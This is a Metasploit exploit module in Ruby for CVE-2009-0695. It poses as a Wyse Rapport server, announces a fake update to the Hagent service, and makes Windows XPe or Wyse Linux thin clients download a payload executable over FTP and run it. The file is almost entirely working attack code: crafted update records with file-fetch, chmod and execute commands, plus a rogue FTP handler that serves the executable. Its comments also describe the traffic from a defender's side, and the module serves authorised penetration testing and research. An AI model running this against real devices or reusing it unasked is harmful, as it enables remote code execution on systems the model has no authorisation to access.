Path: blob/master/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'timeout'

# Impersonates the Wyse Rapport management server ("HServer") towards a
# Hagent client (CVE-2009-0695).  Three network roles are combined in one
# module: a TCP client that contacts the Hagent service on RPORT
# (Msf::Exploit::Remote::Tcp), a local FTP server that serves the generated
# executable (Msf::Exploit::Remote::FtpServer), and an ad-hoc TCP listener
# that answers the client's follow-up HTTP-style queries.
#
# From a defender's point of view the observable sequence is: an inbound
# connection to the Hagent port carrying a "&V54&CI=3|MAC=...|HS=...|PO=...|"
# record, an outbound connection from the client to the advertised HS/PO
# listener, and an outbound FTP retrieval of a randomly named .exe/.bin file
# from the same source address on port 21.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::EXE

  # Module metadata and options.
  #
  # SRVPORT is the local FTP listener port; #exploit refuses to run unless it
  # is 21 (the FTP port is also hard-coded into the update record).  RPORT
  # defaults to 80, the Hagent service port.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wyse Rapport Hagent Fake Hserver Command Execution',
      'Description'    => %q{
          This module exploits the Wyse Rapport Hagent service by pretending to
        be a legitimate server. This process involves starting both HTTP and
        FTP services on the attacker side, then contacting the Hagent service of
        the target and indicating that an update is available. The target will
        then download the payload wrapped in an executable from the FTP service.
      },
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Author'         => 'kf',
      'References'     =>
        [
          ['CVE', '2009-0695'],
          ['OSVDB', '55839'],
          ['US-CERT-VU', '654545'],
          ['URL', 'http://snosoft.blogspot.com/'],
          ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 2048,
          'BadChars' => '',
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => %w{ win linux },
      'Targets'        =>
        [
          [ 'Windows XPe x86',{'Platform' => 'win',}],
          [ 'Wyse Linux x86', {'Platform' => 'linux',}],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-07-10'
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
        Opt::RPORT(80),
      ])
  end


  # Runs the whole exchange in order:
  #   1. connect to the Hagent service and start the FTP server,
  #   2. generate the payload executable and open the TCP listener the client
  #      will be told to call back to,
  #   3. send the "&V54..." record announcing a pending update,
  #   4. answer the client's V01/V02/V55/POST queries on the listener with the
  #      update record (`pwn`) until a terminating query is seen or 190 s pass,
  #   5. wait up to 90 s for the FTP RETR handler to set @exe_sent, then hand
  #      over to the payload handler.
  #
  # Returns early (without a session) when SRVPORT is not 21, when the target
  # sends no reply to the announcement, or when the listener times out.
  def exploit

    # The FTP port is embedded verbatim in the update record (ftpport = 21
    # below), so a different SRVPORT could never be reached by the client.
    if(datastore['SRVPORT'].to_i != 21)
      print_error("This exploit requires the FTP service to run on port 21")
      return
    end

    # Connect to the target service
    print_status("Connecting to the target")
    connect()

    # Start the FTP service
    print_status("Starting the FTP server")
    start_service()

    # Create the executable with our payload
    # NOTE(review): the FTP service is already listening at this point but
    # @exe_file is only assigned on the next line; a SIZE request that arrives
    # in between would call #length on nil in on_client_command_size.
    print_status("Generating the EXE")
    @exe_file = generate_payload_exe
    # Per-platform staging location, file extension and the "CO" value the
    # update record carries; both branches set all three variables.
    if target['Platform'] == 'win'
      maldir = "C:\\" # Windows
      malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
      co = "XP"
    elsif target['Platform'] == 'linux'
      maldir = "//tmp//" # Linux
      malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
      co = "LXS"
    end
    # Flipped to true by on_client_command_retr once the file has been served.
    @exe_sent = false

    # Start the HTTP service
    # This is a raw TCP listener, not an HTTP server: requests are matched by
    # substring below and answered with the bare update record.
    print_status("Starting the HTTP service")
    wdmserver = Rex::Socket::TcpServer.create({
      'Context' => {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    })

    # Let this close automatically
    add_socket(wdmserver)

    # getsockname[2] is the port the OS assigned to the listener.
    wdmserver_port = wdmserver.getsockname[2]
    print_status("Starting the HTTP service on port #{wdmserver_port}")


    # Our own address as seen from the target (HS = "HServer"), a random MAC
    # and the listener port are advertised in the announcement record.
    fakerapport = Rex::Socket.source_address(rhost)
    fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
    mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"

    # FTP Credentials
    # Random one-off credentials; the FtpServer mixin serves the file
    # regardless of them (see on_client_command_retr).
    ftpserver = Rex::Socket.source_address(rhost)
    ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
    ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
    ftpport = 21
    ftpsecure = '0'

    # The update record is a "|"-separated list of commands; \x0f delimits
    # arguments.  pwn1 = client id + SF (fetch file), pwn2 = EX chmod (Linux
    # only), pwn3 = EX (run file) + FTP parameters.
    incr = 10
    pwn1 =
      "&UP0|&SI=1|UR=9" +
      "|CO \x0f#{co}\x0f|#{incr}" +
      # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
      "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"

    pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"

    pwn3 =
      "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
      # "|RB|#{incr+1}" +
      # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
      #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
      # FTP Paramaters
      "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
      "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
      "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
      "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
      # No clue
      "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"

    # pwn is only assigned for the two known platforms; it is referenced by
    # the listener loop below.
    if target['Platform'] == 'win'
      pwn = pwn1 + pwn3
    elsif target['Platform'] == 'linux'
      pwn = pwn1 + pwn2 + pwn3
    end
    # Send the malicious request
    sock.put(mal)

    # Download some response data
    # 10 s read timeout; nil means the target said nothing.
    resp = sock.get_once(-1, 10)
    print_status("Received: #{resp}")

    if not resp
      print_error("No reply from the target, this may not be a vulnerable system")
      return
    end

    # Serve the client's callback queries.  Each accepted connection gets one
    # reply and is closed; V02 and POST end the loop, everything else keeps
    # answering with the update record.  The whole loop is bounded by 190 s.
    print_status("Waiting on a connection to the HTTP service")
    begin
      Timeout.timeout(190) do
        done = false
        while (not done and session = wdmserver.accept)
          req = session.recvfrom(2000)[0]
          next if not req
          next if req.empty?
          print_status("HTTP Request: #{req.split("\n")[0].strip}")

          case req
          when /V01/
            print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
            res = pwn
          when /V02/
            print_status("++ device sending V02 query...")
            # Tell the client there is nothing more to do.
            res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
            done = true

          when /V55/
            print_status("++ device sending V55 query...")
            res = pwn
          when /POST/ # PUT is used for non encrypted requests.
            print_status("++ device sending V55 query...")
            res = pwn
            done = true
          else
            print_status("+++ sending generic response...")
            res = pwn
          end

          print_status("Sending reply: #{res}")
          session.put(res)
          session.close
        end
      end
    rescue ::Timeout::Error
      print_status("Timed out waiting on the HTTP request")
      wdmserver.close
      disconnect
      return
    end

    # Poll for the FTP RETR handler; give up after 90 s but continue to the
    # handler either way.
    print_status("Waiting on the FTP request...")
    stime = Time.now.to_f
    while(not @exe_sent)
      break if (stime + 90 < Time.now.to_f)
      select(nil, nil, nil, 0.25)
    end

    if(not @exe_sent)
      print_status("No executable sent :(")
    end

    wdmserver.close()

    handler
    disconnect
  end

  # FTP RETR handler (FtpServer mixin callback).  Serves @exe_file over a
  # fresh data connection and records that it was sent; the requested path
  # (arg) is logged but not checked, so any RETR receives the executable.
  #
  # @param c   client control connection (mixin-provided; @state[c][:name]
  #            is presumably the logged-in user name — verify against mixin)
  # @param arg path requested by the client
  def on_client_command_retr(c,arg)
    print_status("#{@state[c][:name]} FTP download request for #{arg}")
    conn = establish_data_connection(c)
    if(not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end

    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
    conn.put(@exe_file)
    c.put("226 Transfer complete.\r\n")
    conn.close
    @exe_sent = true
  end

  # FTP SIZE handler (FtpServer mixin callback).  Always reports the length of
  # @exe_file regardless of arg; @exe_file must already be assigned.
  #
  # @param c   client control connection
  # @param arg path requested by the client (ignored)
  def on_client_command_size(c,arg)
    print_status("#{@state[c][:name]} FTP size request for #{arg}")
    c.put("213 #{@exe_file.length}\r\n")
  end


end

